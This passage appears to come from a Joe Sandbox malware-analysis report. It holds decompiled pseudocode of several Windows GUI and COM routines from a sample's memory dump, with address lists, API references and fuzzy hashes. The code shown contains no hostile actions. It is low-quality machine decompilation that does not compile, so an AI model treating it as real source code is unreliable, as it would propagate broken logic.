								_t62 = InsertMenuItemW( *_t72, _t82, 1,  &_v60);
								_t101 = _t62;
								if(_t62 != 0) {
									_t84[0x275] = _t83;
									return _t83;
								}
								L28:
								E0141C9D3(_t84, _t101, _t83);
								goto L31;
							}
						}
						if(_t60 != 1) {
							goto L19;
						}
						_t69 = CreatePopupMenu();
						if(_t69 == 0) {
							goto L28;
						}
						_v60.fMask = _v60.fMask | 0x00000004;
						_v60.hSubMenu = _t69;
						_t72[1] = 1;
						goto L19;
					}
				} else {
					L31:
					return 0;
				}
			}

0x0141c4d0
0x0141c4d7
0x0141c4db
0x0141c4e1
0x0141c4fd
0x0141c502
0x00000000
0x00000000
0x0141c508
0x0141c511
0x0141c51a
0x0141c521
0x0141c52c
0x0141c537
0x0141c542
0x0141c547
0x0141c549
0x0141c65c
0x0141c65f
0x00000000
0x0141c65f
0x0141c54f
0x0141c555
0x0141c558
0x0141c560
0x0141c56a
0x0141c56d
0x0141c56f
0x0141c575
0x0141c577
0x00000000
0x00000000
0x0141c580
0x0141c582
0x0141c586
0x00000000
0x00000000
0x0141c595
0x0141c597
0x00000000
0x00000000
0x00000000
0x0141c52e
0x0141c52e
0x0141c533
0x0141c59d
0x0141c5a3
0x0141c5a6
0x0141c5a9
0x0141c5b0
0x0141c5b3
0x0141c5b6
0x0141c5b9
0x0141c5bc
0x0141c5be
0x0141c5dc
0x0141c5df
0x0141c5ea
0x0141c5ee
0x0141c5f0
0x0141c5f7
0x0141c5f7
0x0141c5e1
0x0141c5e1
0x0141c5e1
0x0141c5fb
0x0141c5fe
0x0141c602
0x0141c632
0x0141c632
0x00000000
0x0141c60f
0x0141c60f
0x0141c613
0x00000000
0x00000000
0x0141c616
0x0141c61c
0x0141c61f
0x0141c625
0x0141c62e
0x0141c62e
0x0141c635
0x0141c63e
0x0141c644
0x0141c646
0x0141c652
0x00000000
0x0141c658
0x0141c648
0x0141c64b
0x00000000
0x0141c64b
0x0141c602
0x0141c5c3
0x00000000
0x00000000
0x0141c5c5
0x0141c5cd
0x00000000
0x00000000
0x0141c5cf
0x0141c5d3
0x0141c5d6
0x00000000
0x0141c5d6
0x0141c664
0x0141c664
0x00000000
0x0141c664

APIs

GetMenuItemInfoW.USER32 ref: 0141C56F
IsMenu.USER32 ref: 0141C58F
CreatePopupMenu.USER32(014829B0,00000000,774233D0), ref: 0141C5C5
GetMenuItemCount.USER32 ref: 0141C616
InsertMenuItemW.USER32(019B59A8,?,00000001,00000030), ref: 0141C63E

Strings

2, xrefs: 0141C5A9
0, xrefs: 0141C51A

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: f4cff423aea523119a78703e96c7cb12dc027dd4dbc4caed2a5494d81bb2438e
Instruction ID: 90fe037ab4073d06c76374a26c4521bd7b70d50c939ca12bc583f1ff808ea205
Opcode Fuzzy Hash: f4cff423aea523119a78703e96c7cb12dc027dd4dbc4caed2a5494d81bb2438e
Instruction Fuzzy Hash: ED51F370A40315DBDF21CF6CCDC4AAEBBF4AF24314F10451AE519A72A9D770A841CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0141CFCA, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0141CFCA(int _a4, short* _a8, char* _a12) {
				long _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t20;
				intOrPtr _t23;
				char* _t35;
				short* _t38;

				_push(_t23);
				_push(_t23);
				_t38 = _a8;
				_t20 = 0;
				_t35 = _a12;
				_v12 = _t23;
				_v8 = 0;
				 *_t35 = 0;
				if( *_t38 == 0) {
					L14:
					return _t20;
				}
				if(E013D4E48(0, _t35, _t38, _t38, L"blank") != 0) {
					if(E013D4E48(0, _t35, _t38, _t38, L"info") != 0) {
						if(E013D4E48(0, _t35, _t38, _t38, L"question") != 0) {
							if(E013D4E48(0, _t35, _t38, _t38, L"stop") != 0) {
								if(E013D4E48(0, _t35, _t38, _t38, L"warning") != 0) {
									ExtractIconExW(_t38, _a4, 0,  &_v8, 1);
									_t20 = _v8;
									if(_t20 != 0) {
										 *_t35 = 1;
									}
									goto L14;
								}
								_push(0x7f03);
								L11:
								_t20 = LoadIconW(_t20, ??);
								goto L14;
							}
							_push(0x7f01);
							goto L11;
						}
						_push(0x7f02);
						goto L11;
					}
					_push(0x7f04);
					goto L11;
				}
				_t6 = _v12 + 0x1b0; // 0x0
				_t20 =  *_t6;
				goto L14;
			}

0x0141cfcd
0x0141cfce
0x0141cfd1
0x0141cfd4
0x0141cfd7
0x0141cfda
0x0141cfdd
0x0141cfe0
0x0141cfe5
0x0141d08e
0x0141d094
0x0141d094
0x0141cffa
0x0141d019
0x0141d031
0x0141d049
0x0141d061
0x0141d07e
0x0141d084
0x0141d089
0x0141d08b
0x0141d08b
0x00000000
0x0141d089
0x0141d063
0x0141d068
0x0141d06f
0x00000000
0x0141d06f
0x0141d04b
0x00000000
0x0141d04b
0x0141d033
0x00000000
0x0141d033
0x0141d01b
0x00000000
0x0141d01b
0x0141cfff
0x0141cfff
0x00000000

APIs

LoadIconW.USER32 ref: 0141D069

Strings

stop, xrefs: 0141D03A
info, xrefs: 0141D00A
warning, xrefs: 0141D052
blank, xrefs: 0141CFEB
question, xrefs: 0141D022

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: e0095c931d14779e417952b73659edc60f2b2523a31bd845a7eb5222b51d022b
Instruction ID: 2535604e08febba428ba16803a576520ce2030a4482f9aaf1673de3b4d473dc4
Opcode Fuzzy Hash: e0095c931d14779e417952b73659edc60f2b2523a31bd845a7eb5222b51d022b
Instruction Fuzzy Hash: 1A113DF6E8830BBAE7124BA8AC86C9B7B9CDF152ACF10003FF50467295D6B5A9424160

Uniqueness

Uniqueness Score: -1.00%

Function 013CFBD2, Relevance: 12.1, APIs: 8, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E013CFBD2(int _a4, struct HWND__* _a8) {
				struct HWND__* _t26;
				intOrPtr _t27;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t37;
				signed int _t48;
				struct HWND__* _t49;
				int _t52;
				int _t55;
				struct HWND__** _t58;
				void* _t63;
				void* _t67;

				if(_a8 != 0) {
					_t48 = E013B23E1(0x14828d0, _a8);
					 *0x148293c = _t48;
				} else {
					_t48 =  *0x148293c; // 0xffffffff
				}
				if(_t48 == 0xffffffff) {
					L22:
					_t26 = 0;
					goto L19;
				} else {
					_t27 =  *0x1482930; // 0x0
					_t52 = 0;
					_t58 =  *( *(_t27 + _t48 * 4));
					_t49 =  *_t58;
					_a8 = _t49;
					if(_t58[0xe] != 0) {
						_t58[0xe] = 0;
						if(_t58[0x63] >= 0) {
							if(_t58[0x66] != 0) {
								E014487E3(_t58, _t58[0x65]);
								_t49 = _a8;
								_t52 = 0;
								_t58[0x66] = 0;
							}
						}
					}
					_t55 = _a4;
					_t63 = _t55 - 8;
					if(_t63 > 0) {
						_t30 = _t55 - 9;
						if(_t30 == 0) {
							L40:
							if(_t58[0xe] == 0) {
								goto L22;
							}
							ShowWindow(_t49, _t55);
							E013CFC88(_a8);
							L18:
							_t26 = 1;
							L19:
							return _t26;
						}
						_t34 = _t30 - 0x37;
						if(_t34 == 0) {
							_push(1);
							L39:
							EnableWindow(_t49, ??);
							goto L18;
						}
						_t36 = _t34 - 1;
						if(_t36 == 0) {
							_push(_t52);
							goto L39;
						}
						_t37 = _t36 - 1;
						if(_t37 == 0) {
							_t58[0xe] = 1;
							LockWindowUpdate(_t49);
						} else {
							if(_t37 == 1) {
								_t58[0xe] = _t52;
								LockWindowUpdate(_t52);
								InvalidateRect( *_t58, 0, 1);
							}
						}
						goto L18;
					}
					if(_t63 == 0) {
						L13:
						if(_t58[0xe] != 0) {
							goto L22;
						} else {
							ShowWindow(_t49, _t55);
							if(_t55 != 8 && _t55 != 4) {
								E013CFC88(_a8);
							}
							_t58[0xe] = 1;
							goto L18;
						}
					}
					if(_t55 == 0) {
						ShowWindow(_t49, _t52);
						_t58[0xe] = 0;
						goto L18;
					}
					if(_t55 == 1) {
						goto L13;
					}
					if(_t55 == 2) {
						_t58[0xe] = 1;
						L27:
						if(_t58[0xe] == 0) {
							goto L22;
						}
						ShowWindow(_t49, 6);
						goto L18;
					}
					_t67 = _t55 - 3;
					if(_t67 == 0) {
						_t58[0xe] = 1;
						goto L40;
					}
					if(_t67 <= 0) {
						goto L18;
					}
					if(_t55 > 5) {
						if(_t55 != 6) {
							goto L18;
						}
						goto L27;
					}
					goto L13;
				}
			}

0x013cfbd9
0x0140f9f5
0x0140f9f7
0x013cfbdf
0x013cfbdf
0x013cfbdf
0x013cfbea
0x013cfc84
0x013cfc84
0x00000000
0x013cfbf0
0x013cfbf0
0x013cfbf5
0x013cfbfa
0x013cfbfc
0x013cfbfe
0x013cfc04
0x013cfc06
0x013cfc0f
0x0140fa08
0x0140fa15
0x0140fa1a
0x0140fa1d
0x0140fa1f
0x0140fa1f
0x0140fa08
0x013cfc0f
0x013cfc15
0x013cfc18
0x013cfc1b
0x0140fa5e
0x0140fa61
0x0140fab7
0x0140fabb
0x00000000
0x00000000
0x0140fac3
0x0140facc
0x013cfc69
0x013cfc6b
0x013cfc6c
0x013cfc6f
0x013cfc6f
0x0140fa63
0x0140fa66
0x0140faa9
0x0140faab
0x0140faac
0x00000000
0x0140faac
0x0140fa68
0x0140fa6b
0x0140faa6
0x00000000
0x0140faa6
0x0140fa6d
0x0140fa70
0x0140fa97
0x0140fa9b
0x0140fa72
0x0140fa75
0x0140fa7c
0x0140fa7f
0x0140fa8b
0x0140fa8b
0x0140fa75
0x00000000
0x0140fa70
0x013cfc21
0x013cfc45
0x013cfc49
0x00000000
0x013cfc4b
0x013cfc4d
0x013cfc56
0x013cfc60
0x013cfc60
0x013cfc65
0x00000000
0x013cfc65
0x013cfc49
0x013cfc25
0x0140fa4d
0x0140fa53
0x00000000
0x0140fa53
0x013cfc2e
0x00000000
0x00000000
0x013cfc33
0x013cfc7b
0x0140fa33
0x0140fa37
0x00000000
0x00000000
0x0140fa40
0x00000000
0x0140fa40
0x013cfc35
0x013cfc38
0x013cfc72
0x00000000
0x013cfc72
0x013cfc3a
0x00000000
0x00000000
0x013cfc3f
0x0140fa2d
0x00000000
0x00000000
0x00000000
0x0140fa2d
0x00000000
0x013cfc3f

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,013F35E0,00000004,00000000,00000000), ref: 013CFC4D
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,013F35E0,00000004,00000000,00000000), ref: 0140FA40
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,013F35E0,00000004,00000000,00000000), ref: 0140FAC3

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: f1448cbd0c9ad446492846de5f1a1884723fac6bd95bd6c902de8499a2051dfe
Instruction ID: 7d976ad521476d8a92281015babc53ea4d324c429fb4eb510e54488c8aac28c1
Opcode Fuzzy Hash: f1448cbd0c9ad446492846de5f1a1884723fac6bd95bd6c902de8499a2051dfe
Instruction Fuzzy Hash: 9A411A357082819BDF3A9B3DC5CC72A7FAFAB55708F04C52DE94746AB0C675A884CB10

Uniqueness

Uniqueness Score: -1.00%

Function 01435777, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E01435777(signed char __ecx, void* __fp0, signed int _a4, signed char* _a8, signed int _a12, signed int _a16, intOrPtr _a20) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed char _v28;
				char _v32;
				signed char _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				char _v80;
				void* _v112;
				intOrPtr _v244;
				signed int _v252;
				signed int _v256;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t161;
				signed int _t162;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int _t176;
				signed int _t177;
				intOrPtr* _t182;
				intOrPtr _t185;
				intOrPtr _t186;
				signed int _t190;
				signed char _t200;
				void* _t201;
				signed int _t213;
				signed int _t216;
				intOrPtr _t218;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr* _t235;
				void* _t239;
				intOrPtr* _t246;
				signed int _t247;
				intOrPtr _t248;
				signed int _t252;
				signed int _t257;
				void* _t259;
				signed int _t260;
				signed char _t265;
				void* _t268;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				void* _t280;
				signed int _t282;
				signed char _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t286;
				void* _t287;
				void* _t288;
				void* _t293;

				_t293 = __fp0;
				_t226 = 0;
				_v56 = 0xfffffffd;
				_t283 = __ecx;
				_t235 = _a12;
				_v28 = __ecx;
				_v16 =  *((intOrPtr*)(_a20 + 8));
				_v60 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v20 = 0;
				_v9 = 0;
				if(_t235 == 0 ||  *_a8 == 0) {
					_t161 = 1;
					__eflags = 1;
					_push(1);
					_push(L"NULL Pointer assignment");
					goto L67;
				} else {
					if(E01435DC2(_t235) != 0) {
						_t165 = 8;
						__eflags =  *((intOrPtr*)(_t235 + 0xc)) - _t165;
						if( *((intOrPtr*)(_t235 + 0xc)) != _t165) {
							_t166 = 0;
						} else {
							_t166 =  *_t235;
						}
						_t167 =  *(_t166 + 8);
						_v24 = _t167;
						__eflags = _t167;
						if(_t167 != 0) {
							_t273 = _a16;
							_v256 = _t226;
							_t161 = E01410BFD( *_a16,  &_v20);
							_pop(_t239);
							__eflags = _t161;
							if(_t161 >= 0) {
								__eflags = _a4 - 1;
								if(__eflags == 0) {
									_t270 = _v20;
									_a4 = 3;
									__eflags = _v20;
									if(__eflags != 0) {
										_t225 = E0141089E(_v24, _t270,  *_t273, _t239,  &_v256);
										_t288 = _t288 + 0xc;
										__eflags = _t225;
										if(__eflags >= 0) {
											__eflags = _v252 & 0x00000001;
											if((_v252 & 0x00000001) != 0) {
												__eflags = _v244 - _t226;
												if(_v244 == _t226) {
													_v9 = 1;
												}
											}
											__eflags = _v252 - 1;
											if(__eflags == 0) {
												_a4 = 1;
											}
										}
									}
								}
								_t275 = _v16 + 1;
								_t257 = 0x10;
								_t259 = 4;
								_push( ~(0 | __eflags > 0x00000000) | ( ~(__eflags > 0) | _t275 * _t257) + _t259);
								_t176 = E013D022B(( ~(__eflags > 0) | _t275 * _t257) + _t259, _t283, __eflags);
								__eflags = _t176;
								if(_t176 == 0) {
									_t260 = _t226;
									_a12 = _t226;
									L25:
									_t177 = _v16;
									_t276 = _t226;
									__eflags = _t177;
									if(_t177 == 0) {
										L29:
										__eflags = _v256;
										if(_v256 == 0) {
											L39:
											__eflags = _a4 & 0x0000000c;
											_t277 = _a12;
											_v40 = _t177;
											_v48 = _t277;
											if((_a4 & 0x0000000c) != 0) {
												_v36 = 1;
												_v44 =  &_v56;
											}
											__imp__#8( &_v80);
											E013D2760(_t277,  &_v112, _t226, 0x20);
											_t246 = _v24;
											__eflags = _v9;
											_push( &_v32);
											_push( &_v112);
											_t182 =  *((intOrPtr*)( *_t246 + 0x18));
											if(_v9 == 0) {
												_push( &_v80);
											} else {
												_push(_t226);
											}
											_t264 =  &_v48;
											_t247 =  *_t182(_t246, _v20, 0x1450b7c, 0x800, _a4,  &_v48);
											__eflags = _t247 - 0x80020003;
											if(_t247 != 0x80020003) {
												L47:
												__eflags = _t247;
												if(_t247 >= 0) {
													_t248 =  *((intOrPtr*)( *_t283 + 4));
													__eflags =  *((char*)(_t248 + _t283 + 0xd));
													_t185 =  *((intOrPtr*)(_t248 + _t283 + 8));
													if( *((char*)(_t248 + _t283 + 0xd)) != 0) {
														_t185 =  *((intOrPtr*)(_t185 + 0x38));
													}
													 *(_t185 + 0x14) = _t226;
													__eflags =  *((char*)(_t248 + _t283 + 0xd));
													_t186 =  *((intOrPtr*)(_t248 + _t283 + 8));
													if( *((char*)(_t248 + _t283 + 0xd)) != 0) {
														_t186 =  *((intOrPtr*)(_t186 + 0x38));
													}
													 *(_t186 + 0x18) = _t226;
													_t249 =  *_a8;
													E01421570( *_a8, _t264,  &_v80);
													_t190 = _v16;
													_t284 = _t226;
													__eflags = _t190;
													if(_t190 != 0) {
														_t228 = (_t190 << 4) - 0x10 + _t277;
														__eflags = 1;
														do {
															_t265 =  *( *((intOrPtr*)(_a20 + 4)) + _t284 * 4);
															_a4 = _t265;
															__eflags =  *((intOrPtr*)(_t265 + 0xc)) - 6;
															if( *((intOrPtr*)(_t265 + 0xc)) != 6) {
																goto L61;
															}
															__eflags = _v256;
															if(_v256 == 0) {
																L60:
																_t249 =  *_t265;
																E01421570( *_t265, _t265, _t228);
																goto L61;
															}
															_t249 = 0x4024;
															__eflags = ( *(_t287 + _t284 * 4 - 0xec) & 0x0000ffff) - 0x4024;
															if(__eflags == 0) {
																goto L61;
															}
															asm("bt ax, di");
															_push(0xe);
															_t249 = 0x4000 | __eflags >= 0x00000000;
															asm("bt ax, dx");
															_t265 = _a4;
															_t200 =  *(_t287 + _t284 * 4 - 0xec) & 0xff00 | __eflags >= 0x00000000;
															__eflags = _t200 & _t249;
															if((_t200 & _t249) == 0) {
																goto L60;
															}
															_t201 = 8;
															__eflags =  *_t228 - _t201;
															if( *_t228 != _t201) {
																goto L61;
															}
															goto L60;
															L61:
															_t284 = _t284 + 1;
															_t228 = _t228 - 0x10;
															__eflags = _t284 - _v16;
														} while (_t284 < _v16);
														_t226 = _v60;
														_t277 = _a12;
													}
													goto L63;
												}
												goto L48;
											} else {
												__eflags = _v36 - 1;
												if(_v36 != 1) {
													L48:
													_t112 = _t247 + 0x7ffdfff7; // 0x7ffdfff7
													_push(1);
													asm("sbb eax, eax");
													_push(_t226);
													_push( !( ~_t112) &  &_v112);
													_push(_t247);
													_t249 = _t283;
													_t226 = E01434FA8(_t283, _t293);
													L63:
													__imp__#9( &_v80);
													__eflags = _t277;
													if(_t277 != 0) {
														E01417EEF(_t277, _t249);
													}
													_t162 = _t226;
													goto L69;
												}
												_t264 = _v24;
												_t280 = 4;
												__eflags = _a4 - _t280;
												_t106 = _a4 == _t280;
												__eflags = _t106;
												_t213 =  *((intOrPtr*)( *_t264 + 0x18))(_t264, _v20, 0x1450b7c, 0x800, 4 + (0 | _t106) * 4,  &_v48, _t226,  &_v112,  &_v32);
												_t277 = _a12;
												_t247 = _t213;
												goto L47;
											}
										}
										_t252 = _t226;
										_a16 = _t252;
										__eflags = _t177;
										if(_t177 == 0) {
											goto L39;
										}
										_t285 = _a20;
										_t58 = _t260 - 0x10; // -16
										_t282 = _t58 + (_t177 << 4);
										__eflags = _t282;
										_t177 = _v16;
										_t268 = 2;
										do {
											__eflags =  *((intOrPtr*)(_t287 + _t252 * 4 - 0xea)) - _t268;
											if( *((intOrPtr*)(_t287 + _t252 * 4 - 0xea)) == _t268) {
												__imp__#9(_t282);
												_t252 = _a16;
												_t216 =  *(_t287 + _t252 * 4 - 0xec) & 0x0000ffff;
												 *_t282 = _t216;
												__eflags = _t216 - 0x4008;
												if(_t216 == 0x4008) {
													__imp__#2(0x144dbf4);
													_t252 = _a16;
													_v52 = _t216;
													 *(_t282 + 8) =  &_v52;
												}
												_t268 = 2;
												_t218 =  *((intOrPtr*)( *((intOrPtr*)(_t285 + 4)) + _t252 * 4));
												__eflags =  *((intOrPtr*)(_t218 + 0xc)) - 6;
												_t177 = _v16;
												if( *((intOrPtr*)(_t218 + 0xc)) != 6) {
													 *(_t282 + 8) = _t282;
												}
											}
											_t252 = _t252 + 1;
											_t282 = _t282 - 0x10;
											_a16 = _t252;
											__eflags = _t252 - _t177;
										} while (_t252 < _t177);
										_t283 = _v28;
										goto L39;
									}
									_t286 = _t177;
									_t232 = (_t286 << 4) + 0xfffffff0 + _t260;
									__eflags = _t232;
									do {
										E0141026A(_t232,  *((intOrPtr*)( *((intOrPtr*)(_a20 + 4)) + _t276 * 4)));
										_t276 = _t276 + 1;
										_t232 = _t232 - 0x10;
										__eflags = _t276 - _t286;
									} while (_t276 < _t286);
									_t283 = _v28;
									_t226 = 0;
									__eflags = 0;
									_t177 = _v16;
									_t260 = _a12;
									goto L29;
								}
								 *_t176 = _t275;
								_t42 = _t176 + 4; // 0x4
								_t260 = _t42;
								_a12 = _t260;
								_a16 = _t260;
								__eflags = _t275;
								if(_t275 == 0) {
									goto L25;
								}
								_t233 = _t260;
								do {
									E01410240(_t233);
									_t233 = _t233 + 0x10;
									_t275 = _t275 - 1;
									__eflags = _t275;
								} while (_t275 != 0);
								_t260 = _a12;
								_t226 = 0;
								goto L25;
							} else {
								_push(1);
								_push(_t226);
								L67:
								_push(_t226);
								_push(_t161);
								goto L68;
							}
						} else {
							_push(1);
							_push(L"NULL Pointer assignment");
							_push(_t226);
							_push(4);
							goto L68;
						}
					} else {
						_push(1);
						_push(L"Not an Object type");
						_push(0);
						_push(2);
						L68:
						_t162 = E01434FA8(_t283, _t293);
						L69:
						return _t162;
					}
				}
			}

0x01435777
0x01435784
0x01435786
0x01435791
0x01435793
0x01435796
0x01435799
0x0143579c
0x0143579f
0x014357a2
0x014357a5
0x014357a8
0x014357ab
0x014357ae
0x014357b4
0x01435b4a
0x01435b4a
0x01435b4b
0x01435b4c
0x00000000
0x014357c5
0x014357cc
0x014357df
0x014357e0
0x014357e3
0x014357e9
0x014357e5
0x014357e5
0x014357e5
0x014357eb
0x014357ee
0x014357f1
0x014357f3
0x01435804
0x0143580d
0x01435815
0x0143581a
0x0143581b
0x0143581d
0x0143582a
0x0143582e
0x01435830
0x01435833
0x0143583a
0x0143583c
0x0143584b
0x01435850
0x01435853
0x01435855
0x01435857
0x0143585e
0x01435860
0x01435867
0x01435869
0x01435869
0x01435867
0x0143586d
0x01435874
0x01435876
0x01435876
0x01435874
0x01435855
0x0143583c
0x01435884
0x01435885
0x0143588c
0x0143589f
0x014358a0
0x014358a6
0x014358a8
0x014358d1
0x014358d3
0x014358d6
0x014358d6
0x014358d9
0x014358db
0x014358dd
0x0143590e
0x0143590e
0x01435915
0x01435994
0x01435994
0x01435998
0x0143599b
0x0143599e
0x014359a1
0x014359a6
0x014359ad
0x014359ad
0x014359b4
0x014359c1
0x014359c6
0x014359cf
0x014359d5
0x014359d9
0x014359da
0x014359dd
0x014359e5
0x014359df
0x014359df
0x014359df
0x014359e6
0x014359fd
0x014359ff
0x01435a05
0x01435a49
0x01435a49
0x01435a4b
0x01435a73
0x01435a76
0x01435a7b
0x01435a7f
0x01435a81
0x01435a81
0x01435a84
0x01435a87
0x01435a8c
0x01435a90
0x01435a92
0x01435a92
0x01435a95
0x01435a9f
0x01435aa1
0x01435aa6
0x01435aa9
0x01435aab
0x01435aad
0x01435ab5
0x01435ab9
0x01435aba
0x01435ac0
0x01435ac3
0x01435ac6
0x01435aca
0x00000000
0x00000000
0x01435acc
0x01435ad3
0x01435b17
0x01435b17
0x01435b1a
0x00000000
0x01435b1a
0x01435add
0x01435ae2
0x01435ae5
0x00000000
0x00000000
0x01435aef
0x01435afb
0x01435afe
0x01435b01
0x01435b05
0x01435b08
0x01435b0b
0x01435b0d
0x00000000
0x00000000
0x01435b11
0x01435b12
0x01435b15
0x00000000
0x00000000
0x00000000
0x01435b1f
0x01435b1f
0x01435b20
0x01435b23
0x01435b23
0x01435b28
0x01435b2b
0x01435b2b
0x00000000
0x01435aad
0x00000000
0x01435a07
0x01435a07
0x01435a0b
0x01435a4d
0x01435a4d
0x01435a58
0x01435a5a
0x01435a5e
0x01435a61
0x01435a62
0x01435a63
0x01435a6a
0x01435b2e
0x01435b32
0x01435b38
0x01435b3a
0x01435b3f
0x01435b3f
0x01435b44
0x00000000
0x01435b44
0x01435a0d
0x01435a21
0x01435a24
0x01435a28
0x01435a28
0x01435a41
0x01435a44
0x01435a47
0x00000000
0x01435a47
0x01435a05
0x01435917
0x01435919
0x0143591c
0x0143591e
0x00000000
0x00000000
0x01435920
0x01435923
0x0143592b
0x0143592b
0x0143592d
0x01435930
0x01435931
0x01435931
0x01435939
0x0143593c
0x01435942
0x0143594a
0x01435952
0x01435955
0x01435958
0x0143595f
0x01435965
0x01435968
0x0143596e
0x0143596e
0x01435976
0x01435977
0x0143597a
0x0143597e
0x01435981
0x01435983
0x01435983
0x01435981
0x01435986
0x01435987
0x0143598a
0x0143598d
0x0143598d
0x01435991
0x00000000
0x01435991
0x014358df
0x014358e9
0x014358e9
0x014358eb
0x014358f6
0x014358fb
0x014358fc
0x014358ff
0x014358ff
0x01435903
0x01435906
0x01435906
0x01435908
0x0143590b
0x00000000
0x0143590b
0x014358aa
0x014358ac
0x014358ac
0x014358af
0x014358b2
0x014358b5
0x014358b7
0x00000000
0x00000000
0x014358b9
0x014358bb
0x014358bd
0x014358c2
0x014358c5
0x014358c5
0x014358c5
0x014358ca
0x014358cd
0x00000000
0x0143581f
0x0143581f
0x01435821
0x01435b51
0x01435b51
0x01435b52
0x00000000
0x01435b52
0x014357f5
0x014357f5
0x014357f7
0x014357fc
0x014357fd
0x00000000
0x014357fd
0x014357ce
0x014357ce
0x014357d0
0x014357d5
0x014357d6
0x01435b53
0x01435b55
0x01435b5a
0x01435b5e
0x01435b5e
0x014357cc

Strings

NULL Pointer assignment, xrefs: 014357F7, 01435B4C
Not an Object type, xrefs: 014357D0

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: ae84fe84bea56b83c2f85066b34076efa19313fdbb7c337f8ec97dd9602e0b93
Instruction ID: 8e6b658c578646487b8b4030de51432ebf62210f4cc5001649be2591422bb978
Opcode Fuzzy Hash: ae84fe84bea56b83c2f85066b34076efa19313fdbb7c337f8ec97dd9602e0b93
Instruction Fuzzy Hash: F1D1A375A0020A9FDB14DF99C880AAEB7B5FF8C314F15846AE915AF3A1E770D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01421A18, Relevance: 10.8, APIs: 7, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01421A18(intOrPtr* __ecx, signed short* _a4) {
				char _v12;
				signed short _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v48;
				signed short _v56;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t97;
				signed short* _t102;
				intOrPtr _t105;
				signed int _t107;
				signed int _t108;
				signed int* _t110;
				signed short _t111;
				signed int _t117;
				signed int* _t118;
				signed short _t119;
				signed int _t124;
				signed int* _t125;
				void* _t133;
				signed int _t134;
				signed int _t135;
				signed int* _t136;
				signed int _t137;
				signed short _t139;
				intOrPtr* _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t162;
				signed short _t171;
				signed short _t174;
				void* _t178;
				signed short* _t180;
				signed short _t181;
				intOrPtr _t182;
				intOrPtr _t183;
				signed int _t184;
				signed int _t185;
				signed short* _t186;
				intOrPtr* _t187;
				intOrPtr* _t188;
				signed int _t189;
				intOrPtr* _t190;
				void* _t191;

				_t156 = __ecx;
